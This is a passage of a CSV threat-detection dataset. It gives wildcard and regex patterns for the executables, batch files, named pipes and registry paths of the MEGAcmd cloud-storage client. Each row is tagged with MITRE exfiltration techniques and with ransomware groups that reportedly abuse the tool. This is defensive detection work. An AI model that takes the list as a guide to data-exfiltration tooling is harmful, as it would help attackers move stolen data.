attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*/usr/bin/mega-share*",".{0,1000}\/usr\/bin\/mega\-share.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" 
"*/usr/bin/mega-showpcr*",".{0,1000}\/usr\/bin\/mega\-showpcr.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*/usr/bin/mega-signup*",".{0,1000}\/usr\/bin\/mega\-signup.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*/usr/bin/mega-speedlimit*",".{0,1000}\/usr\/bin\/mega\-speedlimit.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*/usr/bin/mega-sync*",".{0,1000}\/usr\/bin\/mega\-sync.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona 
- Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*/usr/bin/mega-thumbnail*",".{0,1000}\/usr\/bin\/mega\-thumbnail.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*/usr/bin/mega-transfers*",".{0,1000}\/usr\/bin\/mega\-transfers.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*/usr/bin/mega-tree*",".{0,1000}\/usr\/bin\/mega\-tree.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*/usr/bin/mega-userattr*",".{0,1000}\/usr\/bin\/mega\-userattr.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application 
to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*/usr/bin/mega-users*",".{0,1000}\/usr\/bin\/mega\-users.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*/usr/bin/mega-version*",".{0,1000}\/usr\/bin\/mega\-version.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*/usr/bin/mega-webdav*",".{0,1000}\/usr\/bin\/mega\-webdav.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data 
Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*/usr/bin/mega-whoami*",".{0,1000}\/usr\/bin\/mega\-whoami.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*/usr/share/doc/megacmd/*",".{0,1000}\/usr\/share\/doc\/megacmd\/.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*\\.\\pipe\\megacmdpipe_*",".{0,1000}\\\\\.\\\\pipe\\\\megacmdpipe_.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#namedpipe","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*\AppData\Local\MEGAcmd*",".{0,1000}\\AppData\\Local\\MEGAcmd.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused 
by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*\CurrentVersion\Uninstall\MEGAcmd\*",".{0,1000}\\CurrentVersion\\Uninstall\\MEGAcmd\\.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#registry","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*\mega-attr.bat*",".{0,1000}\\mega\-attr\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*\mega-backup.bat*",".{0,1000}\\mega\-backup\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" 
"*\mega-cancel.bat*",".{0,1000}\\mega\-cancel\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*\mega-cat.bat*",".{0,1000}\\mega\-cat\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*\mega-cd.bat*",".{0,1000}\\mega\-cd\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*\MEGAclient.exe*",".{0,1000}\\MEGAclient\.exe.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data 
Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*\MEGAcmd.exe*",".{0,1000}\\MEGAcmd\.exe.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*\MEGAcmd.lnk*",".{0,1000}\\MEGAcmd\.lnk.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*\megacmdpipe_*",".{0,1000}\\megacmdpipe_.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#namedpipe","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*\MEGAcmdServer.exe*",".{0,1000}\\MEGAcmdServer\.exe.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos 
- BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*\MEGAcmdSetup.exe*",".{0,1000}\\MEGAcmdSetup\.exe.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*\MEGAcmdSetup32.exe*",".{0,1000}\\MEGAcmdSetup32\.exe.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*\MEGAcmdSetup64.exe*",".{0,1000}\\MEGAcmdSetup64\.exe.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" 
"*\MEGAcmdSetup64.exe*",".{0,1000}\\MEGAcmdSetup64\.exe.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*\MEGAcmdShell.exe*",".{0,1000}\\MEGAcmdShell\.exe.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*\MEGAcmdUpdater.exe*",".{0,1000}\\MEGAcmdUpdater\.exe.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*\mega-confirm.bat*",".{0,1000}\\mega\-confirm\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - 
EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*\mega-confirmcancel.bat*",".{0,1000}\\mega\-confirmcancel\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*\mega-cp.bat*",".{0,1000}\\mega\-cp\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*\mega-debug.bat*",".{0,1000}\\mega\-debug\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*\mega-deleteversions.bat*",".{0,1000}\\mega\-deleteversions\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by 
attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*\mega-df.bat*",".{0,1000}\\mega\-df\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*\mega-du.bat*",".{0,1000}\\mega\-du\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*\mega-errorcode.bat*",".{0,1000}\\mega\-errorcode\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" 
"*\mega-exclude.bat*",".{0,1000}\\mega\-exclude\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*\mega-export.bat*",".{0,1000}\\mega\-export\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*\mega-find.bat*",".{0,1000}\\mega\-find\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*\mega-ftp.bat*",".{0,1000}\\mega\-ftp\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - 
Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*\mega-get.bat*",".{0,1000}\\mega\-get\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*\mega-graphics.bat*",".{0,1000}\\mega\-graphics\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*\mega-help.bat*",".{0,1000}\\mega\-help\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*\mega-https.bat*",".{0,1000}\\mega\-https\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - 
TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*\mega-import.bat*",".{0,1000}\\mega\-import\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*\mega-invite.bat*",".{0,1000}\\mega\-invite\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*\mega-ipc.bat*",".{0,1000}\\mega\-ipc\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" 
